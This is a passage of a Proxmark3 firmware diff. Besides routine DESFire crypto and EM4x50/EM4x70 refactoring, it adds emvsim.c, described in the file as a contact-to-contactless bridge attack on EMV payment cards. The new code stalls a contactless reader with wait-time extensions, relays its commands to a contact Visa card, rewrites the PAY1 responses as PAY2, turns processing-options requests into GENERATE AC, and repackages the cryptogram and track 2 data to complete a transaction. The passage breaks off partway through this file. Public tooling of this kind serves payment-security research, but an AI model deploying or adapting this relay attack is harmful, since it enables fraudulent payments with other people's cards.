     uint8_t edata[DESFIRE_MAX_CRYPTO_BLOCK_SIZE] = {0};
 
     switch (key->type) {
-        case T_DES:
+        case T_DES: {
             switch (operation) {
-                case MCO_ENCYPHER:
+                case MCO_ENCYPHER: {
                     //DES_ecb_encrypt ((DES_cblock *) data, (DES_cblock *) edata, &(key->ks1), DES_ENCRYPT);
                     des_encrypt(edata, data, key->data);
                     break;
-                case MCO_DECYPHER:
+                }
+                case MCO_DECYPHER:  {
                     //DES_ecb_encrypt ((DES_cblock *) data, (DES_cblock *) edata, &(key->ks1), DES_DECRYPT);
                     des_decrypt(edata, data, key->data);
                     break;
+                }
             }
             break;
-        case T_3DES:
+        }
+        case T_3DES: {
             switch (operation) {
-                case MCO_ENCYPHER:
+                case MCO_ENCYPHER: {
                     mbedtls_des3_set2key_enc(&ctx3, key->data);
                     mbedtls_des3_crypt_ecb(&ctx3, data, edata);
                     // DES_ecb_encrypt ((DES_cblock *) data,  (DES_cblock *) edata, &(key->ks1), DES_ENCRYPT);
                     // DES_ecb_encrypt ((DES_cblock *) edata, (DES_cblock *) data,  &(key->ks2), DES_DECRYPT);
                     // DES_ecb_encrypt ((DES_cblock *) data,  (DES_cblock *) edata, &(key->ks1), DES_ENCRYPT);
                     break;
-                case MCO_DECYPHER:
+                }
+                case MCO_DECYPHER: {
                     mbedtls_des3_set2key_dec(&ctx3, key->data);
                     mbedtls_des3_crypt_ecb(&ctx3, data, edata);
                     // DES_ecb_encrypt ((DES_cblock *) data,  (DES_cblock *) edata, &(key->ks1), DES_DECRYPT);
                     // DES_ecb_encrypt ((DES_cblock *) edata, (DES_cblock *) data,  &(key->ks2), DES_ENCRYPT);
                     // DES_ecb_encrypt ((DES_cblock *) data,  (DES_cblock *) edata, &(key->ks1), DES_DECRYPT);
                     break;
+                }
             }
             break;
-        case T_3K3DES:
+        }
+        case T_3K3DES: {
             switch (operation) {
-                case MCO_ENCYPHER:
+                case MCO_ENCYPHER: {
                     mbedtls_des3_set3key_enc(&ctx3, key->data);
                     mbedtls_des3_crypt_ecb(&ctx3, data, edata);
                     // DES_ecb_encrypt ((DES_cblock *) data,  (DES_cblock *) edata, &(key->ks1), DES_ENCRYPT);
                     // DES_ecb_encrypt ((DES_cblock *) edata, (DES_cblock *) data,  &(key->ks2), DES_DECRYPT);
                     // DES_ecb_encrypt ((DES_cblock *) data,  (DES_cblock *) edata, &(key->ks3), DES_ENCRYPT);
                     break;
-                case MCO_DECYPHER:
+                }
+                case MCO_DECYPHER: {
                     mbedtls_des3_set3key_dec(&ctx3, key->data);
                     mbedtls_des3_crypt_ecb(&ctx3, data, edata);
                     // DES_ecb_encrypt ((DES_cblock *) data,  (DES_cblock *) edata, &(key->ks3), DES_DECRYPT);
                     // DES_ecb_encrypt ((DES_cblock *) edata, (DES_cblock *) data,  &(key->ks2), DES_ENCRYPT);
                     // DES_ecb_encrypt ((DES_cblock *) data,  (DES_cblock *) edata, &(key->ks1), DES_DECRYPT);
                     break;
+                }
             }
             break;
-        case T_AES:
+        }
+        case T_AES: {
             switch (operation) {
                 case MCO_ENCYPHER: {
                     mbedtls_aes_init(&actx);
                     mbedtls_aes_setkey_enc(&actx, key->data, 128);
-                    mbedtls_aes_crypt_cbc(&actx, MBEDTLS_AES_ENCRYPT, sizeof(edata), ivect, data, edata);
+                    mbedtls_aes_crypt_ecb(&actx, MBEDTLS_AES_ENCRYPT, data, edata);
                     break;
                 }
                 case MCO_DECYPHER: {
                     mbedtls_aes_init(&actx);
                     mbedtls_aes_setkey_dec(&actx, key->data, 128);
-                    mbedtls_aes_crypt_cbc(&actx, MBEDTLS_AES_DECRYPT, sizeof(edata), ivect, edata, data);
+                    mbedtls_aes_crypt_ecb(&actx, MBEDTLS_AES_DECRYPT, data, edata);
                     break;
                 }
             }
             break;
+        }
     }
 
     memcpy(data, edata, block_size);
@@ -870,7 +913,7 @@ void mifare_cypher_single_block(desfirekey_t key, uint8_t *data, uint8_t *ivect,
     if (direction == MCD_SEND) {
         memcpy(ivect, data, block_size);
     } else {
-        xor(ivect, data, block_size);
+        xor(data, ivect, block_size);
         memcpy(ivect, ovect, block_size);
     }
 }

armsrc/desfire_crypto.h

@@ -177,13 +177,13 @@ struct desfire_tag {
 typedef struct desfire_tag *desfiretag_t;
 void des_encrypt(void *out, const void *in, const void *key);
 void des_decrypt(void *out, const void *in, const void *key);
-void tdes_nxp_receive(const void *in, void *out, size_t length, const void *key, unsigned char iv[8], int keymode);
-void tdes_nxp_send(const void *in, void *out, size_t length, const void *key, unsigned char iv[8], int keymode);
+void tdes_nxp_receive(const void *in, void *out, size_t length, const void *key, uint8_t *iv, int keymode);
+void tdes_nxp_send(const void *in, void *out, size_t length, const void *key, uint8_t *iv, int keymode);
 
 void aes128_nxp_receive(const void *in, void *out, size_t length, const void *key, unsigned char iv[16]);
 void aes128_nxp_send(const void *in, void *out, size_t length, const void *key, unsigned char iv[16]);
 
-void Desfire_des_key_new(const uint8_t value[8], desfirekey_t key);
+void Desfire_des_key_new(const uint8_t *value, desfirekey_t key);
 void Desfire_3des_key_new(const uint8_t value[16], desfirekey_t key);
 void Desfire_des_key_new_with_version(const uint8_t value[8], desfirekey_t key);
 void Desfire_3des_key_new_with_version(const uint8_t value[16], desfirekey_t key);
@@ -207,4 +207,6 @@ size_t enciphered_data_length(const desfiretag_t tag, const size_t nbytes, int c
 void cmac_generate_subkeys(desfirekey_t key);
 void cmac(const desfirekey_t  key, uint8_t *ivect, const uint8_t *data, size_t len, uint8_t *cmac);
 
+size_t key_macing_length(desfirekey_t key);
+
 #endif

armsrc/em4x50.c

@@ -129,9 +129,9 @@ static bool extract_parities(uint64_t word, uint32_t *data) {
         }
     }
 
-    if ((row_parities == row_parities_calculated) && (col_parities == col_parities_calculated))
+    if ((row_parities == row_parities_calculated) && (col_parities == col_parities_calculated)) {
         return true;
-
+    }
     return false;
 }
 
@@ -748,7 +748,7 @@ void em4x50_chk(const char *filename, bool ledcontrol) {
     uint16_t pwd_count = 0;
     uint32_t size = size_in_spiffs(filename);
     pwd_count = size / 4;
-    uint8_t *pwds = BigBuf_malloc(size);
+    uint8_t *pwds = BigBuf_calloc(size);
 
     rdv40_spiffs_read_as_filetype(filename, pwds, size, RDV40_SPIFFS_SAFETY_SAFE);
 

armsrc/em4x70.h

@@ -19,12 +19,11 @@
 #ifndef EM4x70_H
 #define EM4x70_H
 
+#include <stdint.h>
+#include <stdbool.h>
+#include <assert.h>
 #include "../include/em4x70.h"
 
-typedef struct {
-    uint8_t data[32];
-} em4x70_tag_t;
-
 typedef enum {
     RISING_EDGE,
     FALLING_EDGE

armsrc/emvsim.c

@@ -0,0 +1,682 @@
+//-----------------------------------------------------------------------------
+// Copyright (C) n-hutton - Sept 2024
+// Copyright (C) Proxmark3 contributors. See AUTHORS.md for details.
+//
+// This program is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// This program is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+// GNU General Public License for more details.
+//
+// See LICENSE.txt for the text of the license.
+//-----------------------------------------------------------------------------
+// EVM contact to contactless bridge attack
+//-----------------------------------------------------------------------------
+
+// Verbose Mode:
+// DBG_NONE          0
+// DBG_ERROR         1
+// DBG_INFO          2
+// DBG_DEBUG         3
+// DBG_EXTENDED      4
+
+//  /!\ Printing Debug message is disrupting emulation,
+//  Only use with caution during debugging
+
+// indices into responses array copied from mifare sim init:
+#define ATQA     0
+#define SAK      1
+#define SAKuid   2
+#define UIDBCC1  3
+#define UIDBCC2  8
+#define UIDBCC3  13
+
+#include "emvsim.h"
+#include <inttypes.h>
+#include "BigBuf.h"
+#include "iso14443a.h"
+#include "BigBuf.h"
+#include "string.h"
+#include "mifareutil.h"
+#include "mifaresim.h"
+#include "fpgaloader.h"
+#include "proxmark3_arm.h"
+#include "protocols.h"
+#include "util.h"
+#include "commonutil.h"
+#include "dbprint.h"
+#include "ticks.h"
+#include "i2c_direct.h"
+
+// Hardcoded response to the reader for file not found, plus the checksum
+static uint8_t filenotfound[] = {0x02, 0x6a, 0x82, 0x93, 0x2f};
+
+// TLV response for PPSE directory request
+static uint8_t pay1_response[] = { 0x6F, 0x1E, 0x84, 0x0E };
+
+// The WTX we want to send out... The format:
+// 0xf2 is the command
+// 0x0e is the time to wait (currently at max)
+// The remaining bytes are CRC, precalculated for speed
+static uint8_t extend_resp[] = {0xf2, 0x0e, 0x66, 0xb8};
+
+
+// For reference, we have here the pay1 template we receive from the card, and the pay2 template we send back to the reader
+// These can be inspected at https://emvlab.org/tlvutils/
+// Note that the pay2 template is coded for visa ps in the UK - other countries may have different templates. Refer:
+// https://mstcompany.net/blog/acquiring-emv-transaction-flow-part-3-get-processing-options-with-and-without-pdol
+// Specifically, 9F5A: Application Program Identifier: 3108260826 might have to become 31 0840 0840 for USA for example.
+// todo: see if this can be read from the card and automatically populated rather than hard coded
+//static uint8_t fci_template_pay1[] = {0xff, 0x6f, 0x3b, 0x84, 0x07, 0xa0, 0x00, 0x00, 0x00, 0x03, 0x10, 0x10, 0xa5, 0x30, 0x50, 0x0a, 0x56, 0x69, 0x73, 0x61, 0x20, 0x44, 0x65, 0x62, 0x69, 0x74, 0x5f, 0x2d, 0x02, 0x65, 0x6e, 0x9f, 0x12, 0x0a, 0x56, 0x69, 0x73, 0x61, 0x20, 0x44, 0x65, 0x62, 0x69, 0x74, 0x9f, 0x11, 0x01, 0x01, 0xbf, 0x0c, 0x0b, 0x9f, 0x0a, 0x08, 0x00, 0x01, 0x05, 0x01, 0x00, 0x00, 0x00, 0x00, 0x90, 0x00, 0x17, 0x48};
+static uint8_t fci_template_pay2[] = {0x02, 0x6f, 0x5e, 0x84, 0x07, 0xa0, 0x00, 0x00, 0x00, 0x03, 0x10, 0x10, 0xa5, 0x53, 0x50, 0x0a, 0x56, 0x69, 0x73, 0x61, 0x20, 0x44, 0x65, 0x62, 0x69, 0x74, 0x9f, 0x38, 0x18, 0x9f, 0x66, 0x04, 0x9f, 0x02, 0x06, 0x9f, 0x03, 0x06, 0x9f, 0x1a, 0x02, 0x95, 0x05, 0x5f, 0x2a, 0x02, 0x9a, 0x03, 0x9c, 0x01, 0x9f, 0x37, 0x04, 0x5f, 0x2d, 0x02, 0x65, 0x6e, 0x9f, 0x11, 0x01, 0x01, 0x9f, 0x12, 0x0a, 0x56, 0x69, 0x73, 0x61, 0x20, 0x44, 0x65, 0x62, 0x69, 0x74, 0xbf, 0x0c, 0x13, 0x9f, 0x5a, 0x05, 0x31, 0x08, 0x26, 0x08, 0x26, 0x9f, 0x0a, 0x08, 0x00, 0x01, 0x05, 0x01, 0x00, 0x00, 0x00, 0x00, 0x90, 0x00, 0xd8, 0x15};
+
+// This is the hardcoded response that a contactless card would respond with when asked to select PPSE.
+// It is a TLV structure, and can be seen here:
+// https://emvlab.org/tlvutils/?data=6f3e840e325041592e5359532e4444463031a52cbf0c2961274f07a0000000031010500a566973612044656269749f0a080001050100000000bf6304df200180
+// The first byte is the class byte, and the payload is followed by 0x9000, which is the success code, and the CRC (precalculated)
+static uint8_t pay2_response[] = { 0x03, 0x6f, 0x3e, 0x84, 0x0e, 0x32, 0x50, 0x41, 0x59, 0x2e, 0x53, 0x59, 0x53, 0x2e, 0x44, 0x44, 0x46, 0x30, 0x31, 0xa5, 0x2c, 0xbf, 0x0c, 0x29, 0x61, 0x27, 0x4f, 0x07, 0xa0, 0x00, 0x00, 0x00, 0x03, 0x10, 0x10, 0x50, 0x0a, 0x56, 0x69, 0x73, 0x61, 0x20, 0x44, 0x65, 0x62, 0x69, 0x74, 0x9f, 0x0a, 0x08, 0x00, 0x01, 0x05, 0x01, 0x00, 0x00, 0x00, 0x00, 0xbf, 0x63, 0x04, 0xdf, 0x20, 0x01, 0x80, 0x90, 0x00, 0x07, 0x9d};
+
+void ExecuteEMVSim(uint8_t *receivedCmd, uint16_t receivedCmd_len, uint8_t *receivedCmd_copy, uint16_t receivedCmd_len_copy);
+
+typedef enum {
+    STATE_DEFAULT,
+    SELECT_PAY1,
+    SELECT_PAY1_AID,
+    REQUESTING_CARD_PDOL,
+    GENERATE_AC,
+} SystemState;
+
+static SystemState currentState = STATE_DEFAULT;
+
+// This is the main entry point for the EMV attack, everything before this has just been setup/handshaking.
+// In order to meet the timing requirements, as soon as the proxmark sees a command it immediately
+// caches the command to process and responds with a WTX
+// (waiting time extension). When it get the response to this WTX, it can process the cached command through the I2C interface.
+//
+// The full flow is:
+// 1. Handshake with RATS
+// 2. Reader attempts to find out which payment environment the proxmark supports (may start with SELECT OSE for example)
+// 3. Reader eventually makes a request for the PAY2 application (select PPSE) (contactless payment)
+// 4. We read the PAY1 environment and transform it into PAY2 to respond
+// 5. Reader will select AID we responded in step 4
+// 6. We get the response from selecting the PAY1 AID and transform it into PAY2 response (fci template)
+// - This is important as it contains the PDOL (processing data object list) which specifies the data which is
+//   signed by the card and sent to the reader to verify the transaction.
+// 7. The reader will then issue 'get processing options' which seems to be used here to provide the fields to be signed
+//    as specified by the PDOL.
+// 8. In contactless flow, GPO should at least return the Application Interchange Profile (AIP) and
+//    Application File Locator (AFL). However, here we return track 2 data, the cryptogram, everything. This completes the transaction.
+// 9. To construct this final response, behind the scenes we need to interact with the card to make it think its completing a contact transaction:
+//    - Request PDOL to prime the card (response not used)
+//    - Rearrange the GPO data provided into a 'generate AC' command for the card
+//    - Extract the cryptogram, track 2 data and anything else required
+//    - Respond. Transaction is complete
+void ExecuteEMVSim(uint8_t *receivedCmd, uint16_t receivedCmd_len, uint8_t *receivedCmd_copy, uint16_t receivedCmd_len_copy) {
+    uint8_t responseToReader[MAX_FRAME_SIZE] = {0x00};
+    uint16_t responseToReader_len;
+
+    // special print me
+    Dbprintf("\nrecvd from reader:");
+    Dbhexdump(receivedCmd_len, receivedCmd, false);
+    Dbprintf("");
+
+    // use annotate to give some hints about the command
+    annotate(&receivedCmd[1], receivedCmd_len - 1);
+
+    // This is a common request from the reader which we can just immediately respond to since we know we can't
+    // handle it.
+    if (receivedCmd[6] == 'O' && receivedCmd[7] == 'S' && receivedCmd[8] == 'E') {
+        Dbprintf("We saw OSE... ignore it!");
+        EmSendCmd(filenotfound, sizeof(filenotfound));
+        return;
+    }
+
+    // We want to modify corrupted request
+    if ((receivedCmd_len > 5 && receivedCmd[0] != 0x03 && receivedCmd[0] != 0x02 && receivedCmd[1] == 0 && receivedCmd[4] == 0) || (receivedCmd[2] == 0xa8)) {
+        Dbprintf("We saw signing request... modifying it into a generate ac transaction !!!!");
+
+        currentState = GENERATE_AC;
+
+        memcpy(receivedCmd, (unsigned char[]) { 0x03, 0x80, 0xae, 0x80, 0x00, 0x1d }, 6);
+
+        for (int i = 0; i < 29; i++) {
+            receivedCmd[6 + i] = receivedCmd[12 + i];
+        }
+
+        // clear final byte just in case
+        receivedCmd[35] = 0;
+
+        receivedCmd_len = 35 + 3; // Core command is 35, then there is control code and the crc
+
+        Dbprintf("\nthe command has now become:");
+        Dbhexdump(receivedCmd_len, receivedCmd, false);
+    }
+
+    // Seems unlikely
+    if (receivedCmd_len >= 9 && receivedCmd[6] == '1' && receivedCmd[7] == 'P' && receivedCmd[8] == 'A') {
+        Dbprintf("We saw 1PA... !!!!");
+    }
+
+    // Request more time for 2PAY and respond with a modified 1PAY request. We literally just change the 2 to a 1.
+    if (receivedCmd_len >= 9 && receivedCmd[6] == '2' && receivedCmd[7] == 'P' && receivedCmd[8] == 'A') {
+        Dbprintf("We saw 2PA... switching it to 1PAY !!!!");
+        receivedCmd[6] = '1';
+        currentState = SELECT_PAY1;
+    }
+
+    // We are selecting a short AID - assume it is pay2 aid
+    if (receivedCmd[2] == 0xA4 && receivedCmd[5] == 0x07) {
+        Dbprintf("Selecting pay2 AID");
+        currentState = SELECT_PAY1_AID;
+    }
+
+    static uint8_t rnd_resp[] = {0xb2, 0x67, 0xc7};
+    if (memcmp(receivedCmd, rnd_resp, sizeof(rnd_resp)) == 0) {
+        Dbprintf("We saw bad response... !");
+        return;
+    }
+
+    // We have received the response from a WTX command! Process the cached command at this point.
+    if (memcmp(receivedCmd, extend_resp, sizeof(extend_resp)) == 0) {
+        // Special case: if we are about to do a generate AC, we also need to
+        // make a request for pdol first (and discard response)...
+        if (receivedCmd_copy[1] == 0x80 && receivedCmd_copy[2] == 0xae) {
+            Dbprintf("We are about to do a generate AC... we need to request PDOL first...");
+            uint8_t pdol_request[] = { 0x80, 0xa8, 0x00, 0x00, 0x02, 0x83, 0x00 };
+
+            currentState = REQUESTING_CARD_PDOL;
+            CmdSmartRaw(0xff, &(pdol_request[0]), sizeof(pdol_request), (&responseToReader[0]), &responseToReader_len);
+        }
+
+        // Send the cached command to the card via ISO7816
+        // This is minus 3 because we don't include the first byte (prepend), plus we don't want to send the
+        // last two bytes (CRC) to the card.
+        // On the return, the first class byte must be the same, so it's preserved in responseToReader
+        CmdSmartRaw(receivedCmd_copy[0], &(receivedCmd_copy[1]), receivedCmd_len_copy - 3, (&responseToReader[0]), &responseToReader_len);
+
+        // Print the unadultered response we got from the card here
+        Dbprintf("The response from the card is ==> :");
+        Dbhexdump(responseToReader_len, responseToReader, false);
+
+        // We have passed the reader's query to the card, but before we return it, we need to check if we need to modify
+        // the response to 'pretend' to be a PAY2 environment.
+        // This is always the same response for VISA, the only currently supported card
+        if (currentState == SELECT_PAY1) {
+            Dbprintf("We saw a PAY1 response... modifying it to a PAY2 response !!!!");
+
+            if (!memcmp(&responseToReader[1], &pay1_response[0], sizeof(pay1_response)) == 0) {
+                Dbprintf("The response from the card is not a PAY1 response. This is unexpected and probably fatal.");
+            }
+
+            if (pay2_response[0] != responseToReader[0]) {
+                Dbprintf("The first byte of the PAY2 response is different from the request. This is unexpected and probably fatal.");
+            }
+
+            memcpy(responseToReader, &pay2_response[0], sizeof(pay2_response));
+            responseToReader_len = sizeof(pay2_response);
+        }
+
+        if (responseToReader[0] != 0xff && responseToReader[1] == 0x77 && true) {
+            Dbprintf("we have detected a generate ac response, lets repackage it!!");
+            Dbhexdump(responseToReader_len, responseToReader, false); // special print
+
+            // 11 and 12 are trans counter.
+            // 16 to 24 are the cryptogram
+            // 27 to 34 is issuer application data
+            Dbprintf("atc: %d %d, cryptogram: %d ", responseToReader[11], responseToReader[12], responseToReader[13]);
+
+            // then, on the template:
+            // 60 and 61 for counter
+            // 45 to 53 for cryptogram
+            // 35 to 42 for issuer application data
+            uint8_t template[] = { 0x00, 0x77, 0x47, 0x82, 0x02, 0x39, 0x00, 0x57, 0x13, 0x47,
+                                   0x62, 0x28, 0x00, 0x05, 0x93, 0x38, 0x64, 0xd2, 0x70, 0x92,
+                                   0x01, 0x00, 0x00, 0x01, 0x42, 0x00, 0x00, 0x0f, 0x5f, 0x34,
+                                   0x01, 0x00, 0x9f, 0x10, 0x07, 0x06, 0x01, 0x12, 0x03, 0xa0,
+                                   0x20, 0x00, 0x9f, 0x26, 0x08, 0x56, 0xcb, 0x4e, 0xe1, 0xa4,
+                                   0xef, 0xac, 0x74, 0x9f, 0x27, 0x01, 0x80, 0x9f, 0x36, 0x02,
+                                   0x00, 0x07, 0x9f, 0x6c, 0x02, 0x3e, 0x00, 0x9f, 0x6e, 0x04,
+                                   0x20, 0x70, 0x00, 0x00, 0x90, 0x00, 0xff, 0xff
+                                 };
+
+            // do the replacement
+            template[0] = responseToReader[0]; // class bit 0
+
+            template[60] = responseToReader[10];
+            template[61] = responseToReader[11];
+
+            // Copy responseToReader[15..23] to template[45..53]
+            for (int i = 0; i <= 8; i++) {
+                template[45 + i] = responseToReader[15 + i];
+            }
+
+            // Copy responseToReader[26..32] to template[35..41]
+            for (int i = 0; i <= 6; i++) {
+                template[35 + i] = responseToReader[26 + i];
+            }
+
+            Dbprintf("\nrearranged is: ");
+            responseToReader_len = sizeof(template);
+
+            // We DO NOT add the CRC here, this way we can avoid a million penny payments!
+            // The CRC is calculated here, but doesn't include the class bit at the beginning, plus
+            // also obvisously doesn't include the CRC bytes itself.
+            AddCrc14A(&template[0], responseToReader_len - 2);
+
+            responseToReader_len = sizeof(template);
+            memcpy(responseToReader, &template[0], responseToReader_len);
+
+            Dbprintf("\nafter crc rearranged is: ");
+            Dbhexdump(responseToReader_len, &responseToReader[0], false); // special print
+        }
+
+        // If we would return a PAY1 fci response, we instead return a PAY2 fci response
+        if (currentState == SELECT_PAY1_AID) {
+            Dbprintf("We saw a PAY1 response... modifying it to a PAY2 response for outgoing !!!!");
+            memcpy(responseToReader, fci_template_pay2, sizeof(fci_template_pay2));
+            responseToReader_len = sizeof(fci_template_pay2);
+        }
+
+        EmSendCmd(responseToReader, responseToReader_len);
+
+        return;
+    }
+
+    // Send a request for more time, and cache the command we want to process
+    EmSendCmd(extend_resp, 4);
+}
+
+/**
+* EMVsim - simulate an EMV contactless card transaction by
+*
+*@param flags: See pm3_cmd.h for the full definitions
+*@param exitAfterNReads, exit simulation after n transactions (default 1)
+*@param uid, UID - must be length 7
+*@param atqa, override for ATQA, flags indicate if this is used
+*@param sak, override for SAK, flags indicate if this is used
+* (unless reader attack mode enabled then it runs util it gets enough nonces to recover all keys attmpted)
+*/
+void EMVsim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *uid, uint16_t atqa, uint8_t sak) {
+
+    tag_response_info_t *responses;
+    uint8_t cardSTATE = MFEMUL_NOFIELD;
+    uint8_t uid_len = 0; // 7
+    uint32_t cuid = 0;
+
+    uint8_t receivedCmd[MAX_FRAME_SIZE] = {0x00};
+    uint8_t receivedCmd_copy[MAX_FRAME_SIZE] = {0x00};
+    uint8_t receivedCmd_par[MAX_MIFARE_PARITY_SIZE] = {0x00};
+    uint16_t receivedCmd_len;
+    uint16_t receivedCmd_len_copy = 0;
+
+    if (receivedCmd_len_copy) {
+        Dbprintf("receivedCmd_len_copy: %d", receivedCmd_len_copy);
+    }
+
+    uint8_t *rats = NULL;
+    uint8_t rats_len = 0;
+
+    // if fct is called with NULL we need to assign some memory since this pointer is passed around
+    uint8_t uid_tmp[10] = {0};
+    if (uid == NULL) {
+        uid = uid_tmp;
+    }
+
+    const tUart14a *uart = GetUart14a();
+
+    // free eventually allocated BigBuf memory but keep Emulator Memory
+    BigBuf_free_keep_EM();
+
+    // Print all arguments going into mifare sim init
+    Dbprintf("EMVsim: flags: %04x, uid: %p, atqa: %04x, sak: %02x", flags, uid, atqa, sak);
+
+    if (MifareSimInit(flags, uid, atqa, sak, &responses, &cuid, &uid_len, &rats, &rats_len) == false) {
+        BigBuf_free_keep_EM();
+        return;
+    }
+
+    // Print all the outputs after the sim init
+    Dbprintf("EMVsim: cuid: %08x, uid_len: %d, rats: %p, rats_len: %d", cuid, uid_len, rats, rats_len);
+
+    // We need to listen to the high-frequency, peak-detected path.
+    iso14443a_setup(FPGA_HF_ISO14443A_TAGSIM_LISTEN);
+
+    // clear trace
+    clear_trace();
+    set_tracing(true);
+    LED_D_ON();
+    ResetSspClk();
+
+    int counter = 0;
+    bool finished = false;
+    bool button_pushed = BUTTON_PRESS();
+
+    while ((button_pushed == false) && (finished == false)) {
+
+        WDT_HIT();
+
+        if (counter == 3000) {
+            if (data_available()) {
+                Dbprintf("----------- " _GREEN_("BREAKING") " ----------");
+                break;
+            }
+            counter = 0;
+        } else {
+            counter++;
+        }
+
+        FpgaEnableTracing();
+        // Now, get data from the FPGA
+        int res = EmGetCmd(receivedCmd, sizeof(receivedCmd), &receivedCmd_len, receivedCmd_par);
+
+        if (res == 2) { //Field is off!
+            LEDsoff();
+            if (cardSTATE != MFEMUL_NOFIELD) {
+                Dbprintf("cardSTATE = MFEMUL_NOFIELD");
+                break;
+            }
+            cardSTATE = MFEMUL_NOFIELD;
+            continue;
+        } else if (res == 1) { // button pressed
+            FpgaDisableTracing();
+            button_pushed = true;
+            if (g_dbglevel >= DBG_EXTENDED)
+                Dbprintf("Button pressed");
+            break;
+        }
+
+        // WUPA in HALTED state or REQA or WUPA in any other state
+        if (receivedCmd_len == 1 && ((receivedCmd[0] == ISO14443A_CMD_REQA && cardSTATE != MFEMUL_HALTED) || receivedCmd[0] == ISO14443A_CMD_WUPA)) {
+            EmSendPrecompiledCmd(&responses[ATQA]);
+
+            FpgaDisableTracing();
+
+            LED_B_OFF();
+            LED_C_OFF();
+            cardSTATE = MFEMUL_SELECT;
+
+            continue;
+        }
+
+        switch (cardSTATE) {
+            case MFEMUL_NOFIELD: {
+                if (g_dbglevel >= DBG_EXTENDED)
+                    Dbprintf("MFEMUL_NOFIELD");
+
+                break;
+            }
+            case MFEMUL_HALTED: {
+                if (g_dbglevel >= DBG_EXTENDED)
+                    Dbprintf("MFEMUL_HALTED");
+
+                break;
+            }
+            case MFEMUL_IDLE: {
+                LogTrace(uart->output, uart->len, uart->startTime * 16 - DELAY_AIR2ARM_AS_TAG, uart->endTime * 16 - DELAY_AIR2ARM_AS_TAG, uart->parity, true);
+                if (g_dbglevel >= DBG_EXTENDED)
+                    Dbprintf("MFEMUL_IDLE");
+
+                break;
+            }
+
+            // The anti-collision sequence, which is a mandatory part of the card activation sequence.
+            // It auto with 4-byte UID (= Single Size UID),
+            // 7 -byte UID (= Double Size UID) or 10-byte UID (= Triple Size UID).
+            // For details see chapter 2 of AN10927.pdf
+            //
+            // This case is used for all Cascade Levels, because:
+            // 1) Any devices (under Android for example) after full select procedure completed,
+            //    when UID is known, uses "fast-selection" method. In this case reader ignores
+            //    first cascades and tries to select tag by last bytes of UID of last cascade
+            // 2) Any readers (like ACR122U) uses bit oriented anti-collision frames during selectin,
+            //    same as multiple tags. For details see chapter 6.1.5.3 of ISO/IEC 14443-3
+            case MFEMUL_SELECT: {
+
+                int uid_index = -1;
+                // Extract cascade level
+                if (receivedCmd_len >= 2) {
+                    switch (receivedCmd[0]) {
+                        case ISO14443A_CMD_ANTICOLL_OR_SELECT:
+                            uid_index = UIDBCC1;
+                            break;
+                        case ISO14443A_CMD_ANTICOLL_OR_SELECT_2:
+                            uid_index = UIDBCC2;
+                            break;
+                        case ISO14443A_CMD_ANTICOLL_OR_SELECT_3:
+                            uid_index = UIDBCC3;
+                            break;
+                    }
+                }
+
+                if (uid_index < 0) {
+                    LogTrace(uart->output, uart->len, uart->startTime * 16 - DELAY_AIR2ARM_AS_TAG, uart->endTime * 16 - DELAY_AIR2ARM_AS_TAG, uart->parity, true);
+                    cardSTATE_TO_IDLE();
+                    break;
+                }
+
+                // Incoming SELECT ALL for any cascade level
+                if (receivedCmd_len == 2 && receivedCmd[1] == 0x20) {
+                    EmSendPrecompiledCmd(&responses[uid_index]);
+                    FpgaDisableTracing();
+
+                    break;
+                }
+
+                // Incoming SELECT CLx for any cascade level
+                if (receivedCmd_len == 9 && receivedCmd[1] == 0x70) {
+                    if (memcmp(&receivedCmd[2], responses[uid_index].response, 4) == 0) {
+                        bool cl_finished = (uid_len == 4  && uid_index == UIDBCC1) ||
+                                           (uid_len == 7  && uid_index == UIDBCC2) ||
+                                           (uid_len == 10 && uid_index == UIDBCC3);
+                        EmSendPrecompiledCmd(&responses[cl_finished ? SAK : SAKuid]);
+                        FpgaDisableTracing();
+
+                        if (cl_finished) {
+                            LED_B_ON();
+                            cardSTATE = MFEMUL_WORK;
+                        }
+                    } else {
+                        // IDLE, not our UID
+                        LogTrace(uart->output, uart->len, uart->startTime * 16 - DELAY_AIR2ARM_AS_TAG, uart->endTime * 16 - DELAY_AIR2ARM_AS_TAG, uart->parity, true);
+                        cardSTATE_TO_IDLE();
+                        if (g_dbglevel >= DBG_EXTENDED) Dbprintf("[MFEMUL_SELECT] cardSTATE = MFEMUL_IDLE");
+                    }
+                    break;
+                }
+
+                // Incoming anti-collision frame
+                // receivedCmd[1] indicates number of byte and bit collision, supports only for bit collision is zero
+                if (receivedCmd_len >= 3 && receivedCmd_len <= 6 && (receivedCmd[1] & 0x0f) == 0) {
+                    // we can process only full-byte frame anti-collision procedure
+                    if (memcmp(&receivedCmd[2], responses[uid_index].response, receivedCmd_len - 2) == 0) {
+                        // response missing part of UID via relative array index
+                        EmSendPrecompiledCmd(&responses[uid_index + receivedCmd_len - 2]);
+                        FpgaDisableTracing();
+
+                        if (g_dbglevel >= DBG_EXTENDED) Dbprintf("SELECT ANTICOLLISION - EmSendPrecompiledCmd(%02x)", &responses[uid_index]);
+                        Dbprintf("001 SELECT ANTICOLLISION - EmSendPrecompiledCmd(%02x)", &responses[uid_index]);
+                    } else {
+                        // IDLE, not our UID or split-byte frame anti-collision (not supports)
+                        LogTrace(uart->output, uart->len, uart->startTime * 16 - DELAY_AIR2ARM_AS_TAG, uart->endTime * 16 - DELAY_AIR2ARM_AS_TAG, uart->parity, true);
+                        cardSTATE_TO_IDLE();
+                        if (g_dbglevel >= DBG_EXTENDED) Dbprintf("[MFEMUL_SELECT] cardSTATE = MFEMUL_IDLE");
+                    }
+
+                    break;
+                }
+
+                // Unknown selection procedure
+                LogTrace(uart->output, uart->len, uart->startTime * 16 - DELAY_AIR2ARM_AS_TAG, uart->endTime * 16 - DELAY_AIR2ARM_AS_TAG, uart->parity, true);
+                cardSTATE_TO_IDLE();
+
+                if (g_dbglevel >= DBG_EXTENDED) Dbprintf("[MFEMUL_SELECT] Unknown selection procedure");
+                break;
+            }
+
+            // WORK
+            case MFEMUL_WORK: {
+
+                if (receivedCmd_len == 0) {
+                    if (g_dbglevel >= DBG_EXTENDED) Dbprintf("[MFEMUL_WORK] NO CMD received");
+                    Dbprintf("001 [MFEMUL_WORK] NO CMD received");
+                    break;
+                }
+
+                // all commands must have a valid CRC
